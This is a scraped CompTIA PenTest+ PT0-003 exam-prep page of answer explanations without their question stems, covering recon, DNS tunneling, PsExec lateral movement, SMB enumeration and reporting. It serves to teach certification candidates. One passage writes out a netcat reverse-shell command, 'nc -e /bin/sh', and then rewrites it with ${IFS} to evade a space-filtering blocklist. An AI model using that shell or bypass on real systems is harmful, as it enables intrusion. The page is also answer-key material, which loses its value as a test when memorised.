Pass the CompTIA PenTest+ PT0-003 Questions and answers with CertsForce

A peer review ensures the accuracy, completeness, and objectivity of a penetration test report.

Option A (Risk analysis) ❌: Helps prioritize vulnerabilities but does not validate report accuracy.

Option B (Peer review) ✅: Correct.

Ensures report accuracy and consistency.

Identifies misinterpretations or missing details.

Option C (Root cause analysis) ❌: Helps in remediation but does not verify report quality.

Option D (Client acceptance) ❌: A client review is final verification, but peer review happens earlier to ensure accuracy.

???? Reference: CompTIA PenTest+ PT0-003 Official Guide – Reporting & Quality Assurance

The Wayback Machine is an online tool that archives web pages over time, allowing users to see how a website looked at various points in its history. This can be extremely useful for penetration testers looking to explore potential security weaknesses by searching for subdomains that might have existed in the past.

Accessing the Wayback Machine:

Go to the Wayback Machine website: archive.org/web.

Enter the URL of the target website you want to explore.

Navigating Archived Pages:

The Wayback Machine provides a timeline and calendar interface to browse through different snapshots taken over time.

Select a snapshot to view the archived version of the site. Look for links, subdomains, and resources that may no longer be available in the current version of the website.

Identifying Subdomains:

Examine the archived pages for references to subdomains, which might be visible in links, scripts, or embedded content.

Use the information gathered to identify potential entry points or older versions of web applications that might still be exploitable.

Tool Integration:

Tools like Burp Suite or SpiderFoot can integrate with the Wayback Machine to automate the discovery process of archived subdomains and resources.

Real-World Example:

During a penetration test, a tester might find references to oldadmin.targetsite.com in an archived page from several years ago. This subdomain might no longer be listed in DNS but could still be accessible, leading to potential security vulnerabilities.

References from Pentesting Literature:

In various penetration testing guides and HTB write-ups, using the Wayback Machine is a common technique for passive reconnaissance, providing historical context and revealing past configurations that might still be exploitable.

Step-by-Step ExplanationReferences:

HTB Official Writeups

=================

Covert Data Exfiltration:

DNS traffic can be leveraged for covert data exfiltration because it is often allowed through firewalls and not heavily monitored.

Tools or techniques for DNS tunneling encode sensitive information into DNS queries or responses, resulting in an observable increase in DNS traffic.

Why Not Other Options?

B (URL spidering): This increases HTTP traffic, not DNS traffic.

C (HTML scrapping): Involves downloading website content, which primarily uses HTTP or HTTPS.

D (DoS attack): A DNS-based DoS attack would likely involve query floods from many sources, not necessarily related to the observed behavior in a penetration test.

CompTIA Pentest+ References:

Domain 3.0 (Attacks and Exploits)

Covert Communication Techniques and DNS Tunneling

The presence of SMB (port 445) and MSRPC (port 135) indicates potential Windows network services that could be vulnerable to misconfigurations or exploits.

Enumerate shares and search for vulnerabilities on SMB (Option B):

SMB (Server Message Block) allows file and printer sharing. Misconfigured or open shares could contain sensitive data.

Tools like enum4linux or smbclient can be used to list available shares and check for anonymous access.

SMB vulnerabilities (e.g., EternalBlue - CVE-2017-0144) can be exploited for remote code execution.

PsExec is a Windows Sysinternals tool that allows users to execute commands on a remote system without needing an interactive login session. The command above is executing cmd.exe on a remote Windows Active Directory domain machine (server01.cor.ptia.org).

Option A (Test connectivity using PsExec) ❌: The command does not check connectivity; it executes a command remotely.

Option B (Perform a lateral movement attack) ✅: Correct. Lateral movement occurs when an attacker moves from one compromised machine to another within a network, using valid credentials. PsExec is often used for this purpose.

Option C (Send the PsExec binary) ❌: The command runs cmd.exe remotely, but it does not transfer PsExec itself.

Option D (Enable cmd.exe) ❌: cmd.exe is already enabled by default on most Windows systems.

???? Reference: CompTIA PenTest+ PT0-003 Official Guide – Lateral Movement with PsExec

To bypass a command injection blocklist that filters out the space character, the tester can use ${IFS}. ${IFS} stands for Internal Field Separator in Unix-like systems, which by default is set to space, tab, and newline characters.

Command Injection:

Command injection vulnerabilities allow attackers to execute arbitrary commands on the host operating system via a vulnerable application.

Filters or blocklists are often implemented to prevent exploitation by disallowing certain characters like spaces.

Bypassing Filters:

${IFS}: Using ${IFS} instead of a space can bypass filters that block spaces. ${IFS} expands to a space character in shell commands.

Example: The command nc -e /bin/sh 10.10.10.16 4444 can be rewritten as nc${IFS}-e${IFS}/bin/sh${IFS}10.10.10.16${IFS}4444.

Alternative Encodings:

%0a: Represents a newline character in URL encoding.

+: Sometimes used in place of space in URLs.

%20: URL encoding for space.

However, ${IFS} is most appropriate for shell command contexts.

Pentest References:

Command Injection: Understanding how command injection works and common techniques to exploit it.

Bypassing Filters: Using creative methods like environment variable expansion to bypass input filters and execute commands.

Shell Scripting: Knowledge of shell scripting and environment variables is crucial for effective exploitation.

By using ${IFS}, the tester can bypass the filtered space character and execute the intended command, demonstrating the vulnerability's exploitability.

=================

The issue with the script lies in how the while loop reads the file containing the list of domains. The current script doesn't correctly redirect the file's content to the loop. Changing line 5 to done < "$DOMAINS_LIST" correctly directs the loop to read from the file.

Step-by-Step Explanation

Original Script:

DOMAINS_LIST="/path/to/list.txt"

while read -r i; do

nikto -h $i -o scan-$i.txt &

done

Identified Problem:

The while read -r i; do loop needs to know which file to read lines from. Without redirecting the input file to the loop, it doesn't process any input.

Solution:

Add done < "$DOMAINS_LIST" to the end of the loop to specify the input source.

Corrected script:

DOMAINS_LIST="/path/to/list.txt"

while read -r i; do

nikto -h $i -o scan-$i.txt &

done < "$DOMAINS_LIST"

Explanation:

done < "$DOMAINS_LIST" ensures that the while loop reads each line from DOMAINS_LIST.

This fix makes the loop iterate over each domain in the list and run nikto against each.

References from Pentesting Literature:

Scripting a

=================

Importance of a Clear Executive Summary:

The executive summary is essential because it provides decision-makers with a concise overview of the findings, risks, and recommendations without requiring deep technical knowledge.

Clarity in objectives ensures that all stakeholders understand the purpose, scope, and outcomes of the test.

Why Not Other Options?

A: Keeping video and audio records is helpful during testing but not typically included in the final report for handling purposes.

B: Limiting the report to 5–10 pages may compromise its comprehensiveness and omit critical details.

C: Recommendations based solely on the risk score may not address the broader context or organizational priorities.

CompTIA Pentest+ References:

Domain 5.0 (Reporting and Communication)

SearchSploit is a command-line interface for Exploit-DB that allows testers to quickly search for known exploits based on software name and version.

With Apache 2.2.3, lighttpd 1.4.32, and MySQL, the tester can plug these into SearchSploit to identify vulnerabilities, matching the goal of finding quick attack paths with limited time.

Other tools:

msfvenom: Payload generator, not a search tool.

sqlmap: SQLi exploitation tool, useful for web apps with SQLi, but requires validation of such a vuln first.

BeEF: Browser exploitation framework, not relevant here.

CompTIA PenTest+ Reference:

PT0-003 Objective 2.2 & 2.5: Exploit and identify attack paths.

SearchSploit and Exploit-DB usage are recommended tools in CompTIA’s resources.

Seeing services like OpenSSH 1.2p2 open on 99 hosts, and port 161 (SNMP) with unknown banners on 110 hosts suggests a high level of uniformity, which is uncommon in real-world Windows environments. This strongly points to honeypots being present, possibly for detection or deception.

The official CompTIA guide discusses this under scan anomalies:

“Identical responses from a large number of hosts, especially deprecated versions or unchanging banners, could indicate the presence of honeypots or decoy systems.”